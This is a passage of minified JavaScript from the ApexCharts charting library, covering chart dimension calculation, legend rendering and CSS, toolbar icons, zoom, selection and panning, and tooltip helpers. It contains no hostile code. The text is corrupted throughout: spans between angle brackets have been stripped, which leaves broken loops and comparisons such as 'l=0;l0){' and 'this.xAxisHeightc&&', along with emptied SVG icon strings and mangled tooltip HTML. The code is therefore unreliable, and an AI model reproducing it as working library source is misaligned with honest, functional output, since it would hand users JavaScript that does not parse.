e(a){s(this,e),this.ctx=a,this.w=a.w,this.lgRect={},this.yAxisWidth=0,this.yAxisWidthLeft=0,this.yAxisWidthRight=0,this.xAxisHeight=0,this.isSparkline=this.w.config.chart.sparkline.enabled,this.dimHelpers=new se(this),this.dimYAxis=new ue(this),this.dimXAxis=new le(this),this.dimGrid=new ce(this),this.lgWidthForSideLegends=0,this.gridPad=this.w.config.grid.padding,this.xPadRight=0,this.xPadLeft=0}return u(e,[{key:"plotCoords",value:function(){var e=this,a=this.w,n=a.globals;this.lgRect=this.dimHelpers.getLegendsRect(),this.isSparkline&&(a.config.markers.discrete.length>0||a.config.markers.size>0)&&Object.entries(this.gridPad).forEach((function(a){var n=function(e,a){return function(e){if(Array.isArray(e))return e}(e)||function(e,a){var n=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var i,t,r=[],o=!0,s=!1;try{for(n=n.call(e);!(o=(i=n.next()).done)&&(r.push(i.value),!a||r.length!==a);o=!0);}catch(e){s=!0,t=e}finally{try{o||null==n.return||n.return()}finally{if(s)throw t}}return r}}(e,a)||g(e,a)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(a,2),i=n[0],t=n[1];e.gridPad[i]=Math.max(t,e.w.globals.markers.largestSize/1.5)})),n.axisCharts?this.setDimensionsForAxisCharts():this.setDimensionsForNonAxisCharts(),this.dimGrid.gridPadFortitleSubtitle(),n.gridHeight=n.gridHeight-this.gridPad.top-this.gridPad.bottom,n.gridWidth=n.gridWidth-this.gridPad.left-this.gridPad.right-this.xPadRight-this.xPadLeft;var i=this.dimGrid.gridPadForColumnsInNumericAxis(n.gridWidth);n.gridWidth=n.gridWidth-2*i,n.translateX=n.translateX+this.gridPad.left+this.xPadLeft+(i>0?i+4:0),n.translateY=n.translateY+this.gridPad.top}},{key:"setDimensionsForAxisCharts",value:function(){var e=this,a=this.w,n=a.globals,i=this.dimYAxis.getyAxisLabelsCoords(),t=this.dimYAxis.getyAxisTitleCoords();a.globals.yLabelsCoords=[],a.globals.yTitleCoords=[],a.config.yaxis.map((function(e,n){a.globals.yLabelsCoords.push({width:i[n].width,index:n}),a.globals.yTitleCoords.push({width:t[n].width,index:n})})),this.yAxisWidth=this.dimYAxis.getTotalYAxisWidth();var r=this.dimXAxis.getxAxisLabelsCoords(),o=this.dimXAxis.getxAxisGroupLabelsCoords(),s=this.dimXAxis.getxAxisTitleCoords();this.conditionalChecksForAxisCoords(r,s,o),n.translateXAxisY=a.globals.rotateXLabels?this.xAxisHeight/8:-4,n.translateXAxisX=a.globals.rotateXLabels&&a.globals.isXNumeric&&a.config.xaxis.labels.rotate<=-45?-this.xAxisWidth/4:0,a.globals.isBarHorizontal&&(n.rotateXLabels=!1,n.translateXAxisY=parseInt(a.config.xaxis.labels.style.fontSize,10)/1.5*-1),n.translateXAxisY=n.translateXAxisY+a.config.xaxis.labels.offsetY,n.translateXAxisX=n.translateXAxisX+a.config.xaxis.labels.offsetX;var l=this.yAxisWidth,u=this.xAxisHeight;n.xAxisLabelsHeight=this.xAxisHeight-s.height,n.xAxisGroupLabelsHeight=n.xAxisLabelsHeight-r.height,n.xAxisLabelsWidth=this.xAxisWidth,n.xAxisHeight=this.xAxisHeight;var c=10;("radar"===a.config.chart.type||this.isSparkline)&&(l=0,u=n.goldenPadding),this.isSparkline&&(this.lgRect={height:0,width:0}),(this.isSparkline||"treemap"===a.config.chart.type)&&(l=0,u=0,c=0),this.isSparkline||this.dimXAxis.additionalPaddingXLabels(r);var d=function(){n.translateX=l,n.gridHeight=n.svgHeight-e.lgRect.height-u-(e.isSparkline||"treemap"===a.config.chart.type?0:a.globals.rotateXLabels?10:15),n.gridWidth=n.svgWidth-l};switch("top"===a.config.xaxis.position&&(c=n.xAxisHeight-a.config.xaxis.axisTicks.height-5),a.config.legend.position){case"bottom":n.translateY=c,d();break;case"top":n.translateY=this.lgRect.height+c,d();break;case"left":n.translateY=c,n.translateX=this.lgRect.width+l,n.gridHeight=n.svgHeight-u-12,n.gridWidth=n.svgWidth-this.lgRect.width-l;break;case"right":n.translateY=c,n.translateX=l,n.gridHeight=n.svgHeight-u-12,n.gridWidth=n.svgWidth-this.lgRect.width-l-5;break;default:throw new Error("Legend position not supported")}this.dimGrid.setGridXPosForDualYAxis(t,i),new $(this.ctx).setYAxisXPosition(i,t)}},{key:"setDimensionsForNonAxisCharts",value:function(){var e=this.w,a=e.globals,n=e.config,i=0;e.config.legend.show&&!e.config.legend.floating&&(i=20);var t="pie"===n.chart.type||"polarArea"===n.chart.type||"donut"===n.chart.type?"pie":"radialBar",r=n.plotOptions[t].offsetY,o=n.plotOptions[t].offsetX;if(!n.legend.show||n.legend.floating)return a.gridHeight=a.svgHeight-n.grid.padding.left+n.grid.padding.right,a.gridWidth=a.gridHeight,a.translateY=r,void(a.translateX=o+(a.svgWidth-a.gridWidth)/2);switch(n.legend.position){case"bottom":a.gridHeight=a.svgHeight-this.lgRect.height-a.goldenPadding,a.gridWidth=a.svgWidth,a.translateY=r-10,a.translateX=o+(a.svgWidth-a.gridWidth)/2;break;case"top":a.gridHeight=a.svgHeight-this.lgRect.height-a.goldenPadding,a.gridWidth=a.svgWidth,a.translateY=this.lgRect.height+r+10,a.translateX=o+(a.svgWidth-a.gridWidth)/2;break;case"left":a.gridWidth=a.svgWidth-this.lgRect.width-i,a.gridHeight="auto"!==n.chart.height?a.svgHeight:a.gridWidth,a.translateY=r,a.translateX=o+this.lgRect.width+i;break;case"right":a.gridWidth=a.svgWidth-this.lgRect.width-i-5,a.gridHeight="auto"!==n.chart.height?a.svgHeight:a.gridWidth,a.translateY=r,a.translateX=o+10;break;default:throw new Error("Legend position not supported")}}},{key:"conditionalChecksForAxisCoords",value:function(e,a,n){var i=this.w,t=i.globals.hasGroups?2:1,r=n.height+e.height+a.height,o=i.globals.isMultiLineX?1.2:i.globals.LINE_HEIGHT_RATIO,s=i.globals.rotateXLabels?22:10,l=i.globals.rotateXLabels&&"bottom"===i.config.legend.position?10:0;this.xAxisHeight=r*o+t*s+l,this.xAxisWidth=e.width,this.xAxisHeight-a.height>i.config.xaxis.labels.maxHeight&&(this.xAxisHeight=i.config.xaxis.labels.maxHeight),i.config.xaxis.labels.minHeight&&this.xAxisHeightc&&(this.yAxisWidth=c)}}]),e}(),he=function(){function e(a){s(this,e),this.w=a.w,this.lgCtx=a}return u(e,[{key:"getLegendStyles",value:function(){var e=document.createElement("style");e.setAttribute("type","text/css");var a=document.createTextNode("\t\n \t\n .apexcharts-legend {\t\n display: flex;\t\n overflow: auto;\t\n padding: 0 10px;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom, .apexcharts-legend.apx-legend-position-top {\t\n flex-wrap: wrap\t\n }\t\n .apexcharts-legend.apx-legend-position-right, .apexcharts-legend.apx-legend-position-left {\t\n flex-direction: column;\t\n bottom: 0;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-left, .apexcharts-legend.apx-legend-position-top.apexcharts-align-left, .apexcharts-legend.apx-legend-position-right, .apexcharts-legend.apx-legend-position-left {\t\n justify-content: flex-start;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-center, .apexcharts-legend.apx-legend-position-top.apexcharts-align-center {\t\n justify-content: center; \t\n }\t\n .apexcharts-legend.apx-legend-position-bottom.apexcharts-align-right, .apexcharts-legend.apx-legend-position-top.apexcharts-align-right {\t\n justify-content: flex-end;\t\n }\t\n .apexcharts-legend-series {\t\n cursor: pointer;\t\n line-height: normal;\t\n }\t\n .apexcharts-legend.apx-legend-position-bottom .apexcharts-legend-series, .apexcharts-legend.apx-legend-position-top .apexcharts-legend-series{\t\n display: flex;\t\n align-items: center;\t\n }\t\n .apexcharts-legend-text {\t\n position: relative;\t\n font-size: 14px;\t\n }\t\n .apexcharts-legend-text *, .apexcharts-legend-marker * {\t\n pointer-events: none;\t\n }\t\n .apexcharts-legend-marker {\t\n position: relative;\t\n display: inline-block;\t\n cursor: pointer;\t\n margin-right: 3px;\t\n border-style: solid;\n }\t\n \t\n .apexcharts-legend.apexcharts-align-right .apexcharts-legend-series, .apexcharts-legend.apexcharts-align-left .apexcharts-legend-series{\t\n display: inline-block;\t\n }\t\n .apexcharts-legend-series.apexcharts-no-click {\t\n cursor: auto;\t\n }\t\n .apexcharts-legend .apexcharts-hidden-zero-series, .apexcharts-legend .apexcharts-hidden-null-series {\t\n display: none !important;\t\n }\t\n .apexcharts-inactive-legend {\t\n opacity: 0.45;\t\n }");return e.appendChild(a),e}},{key:"getLegendBBox",value:function(){var e=this.w.globals.dom.baseEl.querySelector(".apexcharts-legend").getBoundingClientRect(),a=e.width;return{clwh:e.height,clww:a}}},{key:"appendToForeignObject",value:function(){var e=this.w.globals;e.dom.elLegendForeign=document.createElementNS(e.SVGNS,"foreignObject");var a=e.dom.elLegendForeign;a.setAttribute("x",0),a.setAttribute("y",0),a.setAttribute("width",e.svgWidth),a.setAttribute("height",e.svgHeight),e.dom.elLegendWrap.setAttribute("xmlns","http://www.w3.org/1999/xhtml"),a.appendChild(e.dom.elLegendWrap),a.appendChild(this.getLegendStyles()),e.dom.Paper.node.insertBefore(a,e.dom.elGraphical.node)}},{key:"toggleDataSeries",value:function(e,a){var n=this,i=this.w;if(i.globals.axisCharts||"radialBar"===i.config.chart.type){i.globals.resized=!0;var t=null,r=null;i.globals.risingSeries=[],i.globals.axisCharts?(t=i.globals.dom.baseEl.querySelector(".apexcharts-series[data\\:realIndex='".concat(e,"']")),r=parseInt(t.getAttribute("data:realIndex"),10)):(t=i.globals.dom.baseEl.querySelector(".apexcharts-series[rel='".concat(e+1,"']")),r=parseInt(t.getAttribute("rel"),10)-1),a?[{cs:i.globals.collapsedSeries,csi:i.globals.collapsedSeriesIndices},{cs:i.globals.ancillaryCollapsedSeries,csi:i.globals.ancillaryCollapsedSeriesIndices}].forEach((function(e){n.riseCollapsedSeries(e.cs,e.csi,r)})):this.hideSeries({seriesEl:t,realIndex:r})}else{var o=i.globals.dom.Paper.select(" .apexcharts-series[rel='".concat(e+1,"'] path")),s=i.config.chart.type;if("pie"===s||"polarArea"===s||"donut"===s){var l=i.config.plotOptions.pie.donut.labels;new S(this.lgCtx.ctx).pathMouseDown(o.members[0],null),this.lgCtx.ctx.pie.printDataLabelsInner(o.members[0].node,l)}o.fire("click")}}},{key:"hideSeries",value:function(e){var a=e.seriesEl,n=e.realIndex,i=this.w,t=k.clone(i.config.series);if(i.globals.axisCharts){var r=!1;if(i.config.yaxis[n]&&i.config.yaxis[n].show&&i.config.yaxis[n].showAlways&&(r=!0,i.globals.ancillaryCollapsedSeriesIndices.indexOf(n)<0&&(i.globals.ancillaryCollapsedSeries.push({index:n,data:t[n].data.slice(),type:a.parentNode.className.baseVal.split("-")[1]}),i.globals.ancillaryCollapsedSeriesIndices.push(n))),!r){i.globals.collapsedSeries.push({index:n,data:t[n].data.slice(),type:a.parentNode.className.baseVal.split("-")[1]}),i.globals.collapsedSeriesIndices.push(n);var o=i.globals.risingSeries.indexOf(n);i.globals.risingSeries.splice(o,1)}}else i.globals.collapsedSeries.push({index:n,data:t[n]}),i.globals.collapsedSeriesIndices.push(n);for(var s=a.childNodes,l=0;l0){for(var r=0;r-1&&(e[i].data=[])})):e.forEach((function(n,i){a.globals.collapsedSeriesIndices.indexOf(i)>-1&&(e[i]=0)})),e}}]),e}(),pe=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w,this.onLegendClick=this.onLegendClick.bind(this),this.onLegendHovered=this.onLegendHovered.bind(this),this.isBarsDistributed="bar"===this.w.config.chart.type&&this.w.config.plotOptions.bar.distributed&&1===this.w.config.series.length,this.legendHelpers=new he(this)}return u(e,[{key:"init",value:function(){var e=this.w,a=e.globals,n=e.config;if((n.legend.showForSingleSeries&&1===a.series.length||this.isBarsDistributed||a.series.length>1||!a.axisCharts)&&n.legend.show){for(;a.dom.elLegendWrap.firstChild;)a.dom.elLegendWrap.removeChild(a.dom.elLegendWrap.firstChild);this.drawLegends(),k.isIE11()?document.getElementsByTagName("head")[0].appendChild(this.legendHelpers.getLegendStyles()):this.legendHelpers.appendToForeignObject(),"bottom"===n.legend.position||"top"===n.legend.position?this.legendAlignHorizontal():"right"!==n.legend.position&&"left"!==n.legend.position||this.legendAlignVertical()}}},{key:"drawLegends",value:function(){var e=this,a=this.w,n=a.config.legend.fontFamily,i=a.globals.seriesNames,t=a.globals.colors.slice();if("heatmap"===a.config.chart.type){var r=a.config.plotOptions.heatmap.colorScale.ranges;i=r.map((function(e){return e.name?e.name:e.from+" - "+e.to})),t=r.map((function(e){return e.color}))}else this.isBarsDistributed&&(i=a.globals.labels.slice());a.config.legend.customLegendItems.length&&(i=a.config.legend.customLegendItems);for(var o=a.globals.legendFormatter,s=a.config.legend.inverseOrder,l=s?i.length-1:0;s?l>=0:l<=i.length-1;s?l--:l++){var u=o(i[l],{seriesIndex:l,w:a}),c=!1,d=!1;if(a.globals.collapsedSeries.length>0)for(var h=0;h0)for(var p=0;p0?l-10:0)+(u>0?u-10:0)}i.style.position="absolute",r=r+e+n.config.legend.offsetX,o=o+a+n.config.legend.offsetY,i.style.left=r+"px",i.style.top=o+"px","bottom"===n.config.legend.position?(i.style.top="auto",i.style.bottom=5-n.config.legend.offsetY+"px"):"right"===n.config.legend.position&&(i.style.left="auto",i.style.right=25+n.config.legend.offsetX+"px"),["width","height"].forEach((function(e){i.style[e]&&(i.style[e]=parseInt(n.config.legend[e],10)+"px")}))}},{key:"legendAlignHorizontal",value:function(){var e=this.w;e.globals.dom.baseEl.querySelector(".apexcharts-legend").style.right=0;var a=this.legendHelpers.getLegendBBox(),n=new de(this.ctx),i=n.dimHelpers.getTitleSubtitleCoords("title"),t=n.dimHelpers.getTitleSubtitleCoords("subtitle"),r=0;"bottom"===e.config.legend.position?r=-a.clwh/1.8:"top"===e.config.legend.position&&(r=i.height+t.height+e.config.title.margin+e.config.subtitle.margin-10),this.setLegendWrapXY(20,r)}},{key:"legendAlignVertical",value:function(){var e=this.w,a=this.legendHelpers.getLegendBBox(),n=0;"left"===e.config.legend.position&&(n=20),"right"===e.config.legend.position&&(n=e.globals.svgWidth-a.clww-10),this.setLegendWrapXY(n,20)}},{key:"onLegendHovered",value:function(e){var a=this.w,n=e.target.classList.contains("apexcharts-legend-text")||e.target.classList.contains("apexcharts-legend-marker");if("heatmap"===a.config.chart.type||this.isBarsDistributed){if(n){var i=parseInt(e.target.getAttribute("rel"),10)-1;this.ctx.events.fireEvent("legendHover",[this.ctx,i,this.w]),new K(this.ctx).highlightRangeInSeries(e,e.target)}}else!e.target.classList.contains("apexcharts-inactive-legend")&&n&&new K(this.ctx).toggleSeriesOnHover(e,e.target)}},{key:"onLegendClick",value:function(e){var a=this.w;if(!a.config.legend.customLegendItems.length&&(e.target.classList.contains("apexcharts-legend-text")||e.target.classList.contains("apexcharts-legend-marker"))){var n=parseInt(e.target.getAttribute("rel"),10)-1,i="true"===e.target.getAttribute("data:collapsed"),t=this.w.config.chart.events.legendClick;"function"==typeof t&&t(this.ctx,n,this.w),this.ctx.events.fireEvent("legendClick",[this.ctx,n,this.w]);var r=this.w.config.legend.markers.onClick;"function"==typeof r&&e.target.classList.contains("apexcharts-legend-marker")&&(r(this.ctx,n,this.w),this.ctx.events.fireEvent("legendMarkerClick",[this.ctx,n,this.w])),"treemap"!==a.config.chart.type&&"heatmap"!==a.config.chart.type&&!this.isBarsDistributed&&a.config.legend.onItemClick.toggleDataSeries&&this.legendHelpers.toggleDataSeries(n,i)}}}]),e}(),me=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w;var n=this.w;this.ev=this.w.config.chart.events,this.selectedClass="apexcharts-selected",this.localeValues=this.w.globals.locale.toolbar,this.minX=n.globals.minX,this.maxX=n.globals.maxX}return u(e,[{key:"createToolbar",value:function(){var e=this,a=this.w,n=function(){return document.createElement("div")},i=n();if(i.setAttribute("class","apexcharts-toolbar"),i.style.top=a.config.chart.toolbar.offsetY+"px",i.style.right=3-a.config.chart.toolbar.offsetX+"px",a.globals.dom.elWrap.appendChild(i),this.elZoom=n(),this.elZoomIn=n(),this.elZoomOut=n(),this.elPan=n(),this.elSelection=n(),this.elZoomReset=n(),this.elMenuIcon=n(),this.elMenu=n(),this.elCustomIcons=[],this.t=a.config.chart.toolbar.tools,Array.isArray(this.t.customIcons))for(var t=0;t\n \n \n\n'),o("zoomOut",this.elZoomOut,'\n \n \n\n');var s=function(n){e.t[n]&&a.config.chart[n].enabled&&r.push({el:"zoom"===n?e.elZoom:e.elSelection,icon:"string"==typeof e.t[n]?e.t[n]:"zoom"===n?'\n \n \n \n':'\n \n \n',title:e.localeValues["zoom"===n?"selectionZoom":"selection"],class:a.globals.isTouchDevice?"apexcharts-element-hidden":"apexcharts-".concat(n,"-icon")})};s("zoom"),s("selection"),this.t.pan&&a.config.chart.zoom.enabled&&r.push({el:this.elPan,icon:"string"==typeof this.t.pan?this.t.pan:'\n \n \n \n \n \n \n \n',title:this.localeValues.pan,class:a.globals.isTouchDevice?"apexcharts-element-hidden":"apexcharts-pan-icon"}),o("reset",this.elZoomReset,'\n \n \n'),this.t.download&&r.push({el:this.elMenuIcon,icon:"string"==typeof this.t.download?this.t.download:'',title:this.localeValues.menu,class:"apexcharts-menu-icon"});for(var l=0;l0&&a.height>0&&this.slDraggableRect.selectize({points:"l, r",pointSize:8,pointType:"rect"}).resize({constraint:{minX:0,minY:0,maxX:e.globals.gridWidth,maxY:e.globals.gridHeight}}).on("resizing",this.selectionDragging.bind(this,"resizing"))}}},{key:"preselectedSelection",value:function(){var e=this.w,a=this.xyRatios;if(!e.globals.zoomEnabled)if(void 0!==e.globals.selection&&null!==e.globals.selection)this.drawSelectionRect(e.globals.selection);else if(void 0!==e.config.chart.selection.xaxis.min&&void 0!==e.config.chart.selection.xaxis.max){var n=(e.config.chart.selection.xaxis.min-e.globals.minX)/a.xRatio,i={x:n,y:0,width:e.globals.gridWidth-(e.globals.maxX-e.config.chart.selection.xaxis.max)/a.xRatio-n,height:e.globals.gridHeight,translateX:0,translateY:0,selectionEnabled:!0};this.drawSelectionRect(i),this.makeSelectionRectDraggable(),"function"==typeof e.config.chart.events.selection&&e.config.chart.events.selection(this.ctx,{xaxis:{min:e.config.chart.selection.xaxis.min,max:e.config.chart.selection.xaxis.max},yaxis:{}})}}},{key:"drawSelectionRect",value:function(e){var a=e.x,n=e.y,i=e.width,t=e.height,r=e.translateX,o=void 0===r?0:r,s=e.translateY,l=void 0===s?0:s,u=this.w,c=this.zoomRect,d=this.selectionRect;if(this.dragged||null!==u.globals.selection){var h={transform:"translate("+o+", "+l+")"};u.globals.zoomEnabled&&this.dragged&&(i<0&&(i=1),c.attr({x:a,y:n,width:i,height:t,fill:u.config.chart.zoom.zoomedArea.fill.color,"fill-opacity":u.config.chart.zoom.zoomedArea.fill.opacity,stroke:u.config.chart.zoom.zoomedArea.stroke.color,"stroke-width":u.config.chart.zoom.zoomedArea.stroke.width,"stroke-opacity":u.config.chart.zoom.zoomedArea.stroke.opacity}),S.setAttrs(c.node,h)),u.globals.selectionEnabled&&(d.attr({x:a,y:n,width:i>0?i:0,height:t>0?t:0,fill:u.config.chart.selection.fill.color,"fill-opacity":u.config.chart.selection.fill.opacity,stroke:u.config.chart.selection.stroke.color,"stroke-width":u.config.chart.selection.stroke.width,"stroke-dasharray":u.config.chart.selection.stroke.dashArray,"stroke-opacity":u.config.chart.selection.stroke.opacity}),S.setAttrs(d.node,h))}}},{key:"hideSelectionRect",value:function(e){e&&e.attr({x:0,y:0,width:0,height:0})}},{key:"selectionDrawing",value:function(e){var a,n=e.context,i=e.zoomtype,t=this.w,r=n,o=this.gridRect.getBoundingClientRect(),s=r.startX-1,l=r.startY,u=!1,c=!1,d=r.clientX-o.left-s,h=r.clientY-o.top-l;return Math.abs(d+s)>t.globals.gridWidth?d=t.globals.gridWidth-s:r.clientX-o.left<0&&(d=s),s>r.clientX-o.left&&(u=!0,d=Math.abs(d)),l>r.clientY-o.top&&(c=!0,h=Math.abs(h)),a="x"===i?{x:u?s-d:s,y:0,width:d,height:t.globals.gridHeight}:"y"===i?{x:0,y:c?l-h:l,width:t.globals.gridWidth,height:h}:{x:u?s-d:s,y:c?l-h:l,width:d,height:h},r.drawSelectionRect(a),r.selectionDragging("resizing"),a}},{key:"selectionDragging",value:function(e,a){var n=this,i=this.w,t=this.xyRatios,r=this.selectionRect,o=0;"resizing"===e&&(o=30);var s=function(e){return parseFloat(r.node.getAttribute(e))},l={x:s("x"),y:s("y"),width:s("width"),height:s("height")};i.globals.selection=l,"function"==typeof i.config.chart.events.selection&&i.globals.selectionEnabled&&(clearTimeout(this.w.globals.selectionResizeTimer),this.w.globals.selectionResizeTimer=window.setTimeout((function(){var e=n.gridRect.getBoundingClientRect(),a=r.node.getBoundingClientRect(),o={xaxis:{min:i.globals.xAxisScale.niceMin+(a.left-e.left)*t.xRatio,max:i.globals.xAxisScale.niceMin+(a.right-e.left)*t.xRatio},yaxis:{min:i.globals.yAxisScale[0].niceMin+(e.bottom-a.bottom)*t.yRatio[0],max:i.globals.yAxisScale[0].niceMax-(a.top-e.top)*t.yRatio[0]}};i.config.chart.events.selection(n.ctx,o),i.config.chart.brush.enabled&&void 0!==i.config.chart.events.brushScrolled&&i.config.chart.events.brushScrolled(n.ctx,o)}),o))}},{key:"selectionDrawn",value:function(e){var a=e.context,n=e.zoomtype,i=this.w,t=a,r=this.xyRatios,o=this.ctx.toolbar;if(t.startX>t.endX){var s=t.startX;t.startX=t.endX,t.endX=s}if(t.startY>t.endY){var l=t.startY;t.startY=t.endY,t.endY=l}var u=void 0,c=void 0;i.globals.isRangeBar?(u=i.globals.yAxisScale[0].niceMin+t.startX*r.invertedYRatio,c=i.globals.yAxisScale[0].niceMin+t.endX*r.invertedYRatio):(u=i.globals.xAxisScale.niceMin+t.startX*r.xRatio,c=i.globals.xAxisScale.niceMin+t.endX*r.xRatio);var d=[],h=[];if(i.config.yaxis.forEach((function(e,a){d.push(i.globals.yAxisScale[a].niceMax-r.yRatio[a]*t.startY),h.push(i.globals.yAxisScale[a].niceMax-r.yRatio[a]*t.endY)})),t.dragged&&(t.dragX>10||t.dragY>10)&&u!==c)if(i.globals.zoomEnabled){var p=k.clone(i.globals.initialConfig.yaxis),m=k.clone(i.globals.initialConfig.xaxis);if(i.globals.zoomed=!0,i.config.xaxis.convertedCatToNumeric&&(u=Math.floor(u),c=Math.floor(c),u<1&&(u=1,c=i.globals.dataPoints),c-u<2&&(c=u+1)),"xy"!==n&&"x"!==n||(m={min:u,max:c}),"xy"!==n&&"y"!==n||p.forEach((function(e,a){p[a].min=h[a],p[a].max=d[a]})),i.config.chart.zoom.autoScaleYaxis){var f=new X(t.ctx);p=f.autoScaleY(t.ctx,p,{xaxis:m})}if(o){var v=o.getBeforeZoomRange(m,p);v&&(m=v.xaxis?v.xaxis:m,p=v.yaxis?v.yaxis:p)}var g={xaxis:m};i.config.chart.group||(g.yaxis=p),t.ctx.updateHelpers._updateOptions(g,!1,t.w.config.chart.animations.dynamicAnimation.enabled),"function"==typeof i.config.chart.events.zoomed&&o.zoomCallback(m,p)}else if(i.globals.selectionEnabled){var b,y=null;b={min:u,max:c},"xy"!==n&&"y"!==n||(y=k.clone(i.config.yaxis)).forEach((function(e,a){y[a].min=h[a],y[a].max=d[a]})),i.globals.selection=t.selection,"function"==typeof i.config.chart.events.selection&&i.config.chart.events.selection(t.ctx,{xaxis:b,yaxis:y})}}},{key:"panDragging",value:function(e){var a=e.context,n=this.w,i=a;if(void 0!==n.globals.lastClientPosition.x){var t=n.globals.lastClientPosition.x-i.clientX,r=n.globals.lastClientPosition.y-i.clientY;Math.abs(t)>Math.abs(r)&&t>0?this.moveDirection="left":Math.abs(t)>Math.abs(r)&&t<0?this.moveDirection="right":Math.abs(r)>Math.abs(t)&&r>0?this.moveDirection="up":Math.abs(r)>Math.abs(t)&&r<0&&(this.moveDirection="down")}n.globals.lastClientPosition={x:i.clientX,y:i.clientY};var o=n.globals.isRangeBar?n.globals.minY:n.globals.minX,s=n.globals.isRangeBar?n.globals.maxY:n.globals.maxX;n.config.xaxis.convertedCatToNumeric||i.panScrolled(o,s)}},{key:"delayedPanScrolled",value:function(){var e=this.w,a=e.globals.minX,n=e.globals.maxX,i=(e.globals.maxX-e.globals.minX)/2;"left"===this.moveDirection?(a=e.globals.minX+i,n=e.globals.maxX+i):"right"===this.moveDirection&&(a=e.globals.minX-i,n=e.globals.maxX-i),a=Math.floor(a),n=Math.floor(n),this.updateScrolledChart({xaxis:{min:a,max:n}},a,n)}},{key:"panScrolled",value:function(e,a){var n=this.w,i=this.xyRatios,t=k.clone(n.globals.initialConfig.yaxis),r=i.xRatio,o=n.globals.minX,s=n.globals.maxX;n.globals.isRangeBar&&(r=i.invertedYRatio,o=n.globals.minY,s=n.globals.maxY),"left"===this.moveDirection?(e=o+n.globals.gridWidth/15*r,a=s+n.globals.gridWidth/15*r):"right"===this.moveDirection&&(e=o-n.globals.gridWidth/15*r,a=s-n.globals.gridWidth/15*r),n.globals.isRangeBar||(en.globals.initialMaxX)&&(e=o,a=s);var l={min:e,max:a};n.config.chart.zoom.autoScaleYaxis&&(t=new X(this.ctx).autoScaleY(this.ctx,t,{xaxis:l}));var u={xaxis:{min:e,max:a}};n.config.chart.group||(u.yaxis=t),this.updateScrolledChart(u,e,a)}},{key:"updateScrolledChart",value:function(e,a,n){var i=this.w;this.ctx.updateHelpers._updateOptions(e,!1,!1),"function"==typeof i.config.chart.events.scrolled&&i.config.chart.events.scrolled(this.ctx,{xaxis:{min:a,max:n}})}}]),n}(),ve=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a,this.ctx=a.ctx}return u(e,[{key:"getNearestValues",value:function(e){var a=e.hoverArea,n=e.elGrid,i=e.clientX,t=e.clientY,r=this.w,o=n.getBoundingClientRect(),s=o.width,l=o.height,u=s/(r.globals.dataPoints-1),c=l/r.globals.dataPoints,d=this.hasBars();!r.globals.comboCharts&&!d||r.config.xaxis.convertedCatToNumeric||(u=s/r.globals.dataPoints);var h=i-o.left-r.globals.barPadForNumericAxis,p=t-o.top;h<0||p<0||h>s||p>l?(a.classList.remove("hovering-zoom"),a.classList.remove("hovering-pan")):r.globals.zoomEnabled?(a.classList.remove("hovering-pan"),a.classList.add("hovering-zoom")):r.globals.panEnabled&&(a.classList.remove("hovering-zoom"),a.classList.add("hovering-pan"));var m=Math.round(h/u),f=Math.floor(p/c);d&&!r.config.xaxis.convertedCatToNumeric&&(m=Math.ceil(h/u),m-=1);var v=null,g=null,b=[],y=[];if(r.globals.seriesXvalues.forEach((function(e){b.push([e[0]+1e-6].concat(e))})),r.globals.seriesYvalues.forEach((function(e){y.push([e[0]+1e-6].concat(e))})),b=b.map((function(e){return e.filter((function(e){return k.isNumber(e)}))})),y=y.map((function(e){return e.filter((function(e){return k.isNumber(e)}))})),r.globals.isXNumeric){var x=this.ttCtx.getElGrid().getBoundingClientRect(),S=h*(x.width/s),A=p*(x.height/l);v=(g=this.closestInMultiArray(S,A,b,y)).index,m=g.j,null!==v&&(b=r.globals.seriesXvalues[v],m=(g=this.closestInArray(S,b)).index)}return r.globals.capturedSeriesIndex=null===v?-1:v,(!m||m<1)&&(m=0),r.globals.isBarHorizontal?r.globals.capturedDataPointIndex=f:r.globals.capturedDataPointIndex=m,{capturedSeries:v,j:r.globals.isBarHorizontal?f:m,hoverX:h,hoverY:p}}},{key:"closestInMultiArray",value:function(e,a,n,i){var t=this.w,r=0,o=null,s=-1;t.globals.series.length>1?r=this.getFirstActiveXArray(n):o=0;var l=n[r][0],u=Math.abs(e-l);if(n.forEach((function(a){a.forEach((function(a,n){var i=Math.abs(e-a);i0?a:-1})),t=0;t0)for(var i=0;i0}},{key:"getElBars",value:function(){return this.w.globals.dom.baseEl.querySelectorAll(".apexcharts-bar-series, .apexcharts-candlestick-series, .apexcharts-boxPlot-series, .apexcharts-rangebar-series")}},{key:"hasBars",value:function(){return this.getElBars().length>0}},{key:"getHoverMarkerSize",value:function(e){var a=this.w,n=a.config.markers.hover.size;return void 0===n&&(n=a.globals.markers.size[e]+a.config.markers.hover.sizeOffset),n}},{key:"toggleAllTooltipSeriesGroups",value:function(e){var a=this.w,n=this.ttCtx;0===n.allTooltipSeriesGroups.length&&(n.allTooltipSeriesGroups=a.globals.dom.baseEl.querySelectorAll(".apexcharts-tooltip-series-group"));for(var i=n.allTooltipSeriesGroups,t=0;t ').concat(n.attrs.name,""),a+="
".concat(n.val,"
")})),b.innerHTML=e+"",k.innerHTML=a+""};o?l.globals.seriesGoals[a][n]&&Array.isArray(l.globals.seriesGoals[a][n])?y():(b.innerHTML="",k.innerHTML=""):y()}else b.innerHTML="",k.innerHTML="";null!==m&&(i[a].querySelector(".apexcharts-tooltip-text-z-label").innerHTML=l.config.tooltip.z.title,i[a].querySelector(".apexcharts-tooltip-text-z-value").innerHTML=void 0!==m?m:""),o&&f[0]&&(null==c||l.globals.ancillaryCollapsedSeriesIndices.indexOf(a)>-1||l.globals.collapsedSeriesIndices.indexOf(a)>-1?f[0].parentNode.style.display="none":f[0].parentNode.style.display=l.config.tooltip.items.display)}},{key:"toggleActiveInactiveSeries",value:function(e){var a=this.w;if(e)this.tooltipUtil.toggleAllTooltipSeriesGroups("enable");else{this.tooltipUtil.toggleAllTooltipSeriesGroups("disable");var 